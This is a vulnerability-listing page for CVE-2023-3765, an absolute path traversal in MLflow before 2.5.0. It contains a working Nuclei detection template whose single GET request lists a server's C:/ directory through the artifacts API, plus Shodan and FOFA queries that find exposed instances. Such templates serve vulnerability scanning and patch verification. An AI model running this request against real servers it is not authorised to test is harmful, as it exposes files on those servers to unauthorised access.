CVE-2023-3765: MLflow Absolute Path Traversal

日期: 2025-08-01 | 影响软件: MLflow | POC: 已公开

漏洞描述

Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.5.0.

PoC代码[已公开]

id: CVE-2023-3765

info:
  name: MLflow Absolute Path Traversal
  author: DhiyaneshDK
  severity: critical
  description: |
    Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.5.0.
  impact: |
    This vulnerability can lead to unauthorized access to sensitive information stored on the server.
  remediation: |
    Upgrade to a patched version of MLflow to mitigate the Absolute Path Traversal vulnerability.
  reference:
    - https://www.tenable.com/cve/CVE-2023-3765
    - https://huntr.dev/bounties/4be5fd63-8a0a-490d-9ee1-f33dc768ed76
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3765
    - https://github.com/mlflow/mlflow/commit/6dde93758d42455cb90ef324407919ed67668b9b
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2023-3765
    cwe-id: CWE-36
    epss-score: 0.9279
    epss-percentile: 0.9975
    cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: lfprojects
    product: mlflow
    shodan-query: http.title:"mlflow"
    fofa-query:
      - title="mlflow"
      - app="mlflow"
    google-query: intitle:"mlflow"
  tags: cve2023,cve,mflow,lfi,huntr,lfprojects,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"is_dir":'
          - '"path":'
          - '"files":'
        condition: and

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206d39d00ceb4f561c4e48b66d5e9ead3d763420954bcffd201f79831260d46d23022100a0fca7f8e5075c2d716ab62094e22b008505eeba6b5138e3036cc790ebbd94c8:922c64590222798bb761d5b6d8e72950

相关漏洞推荐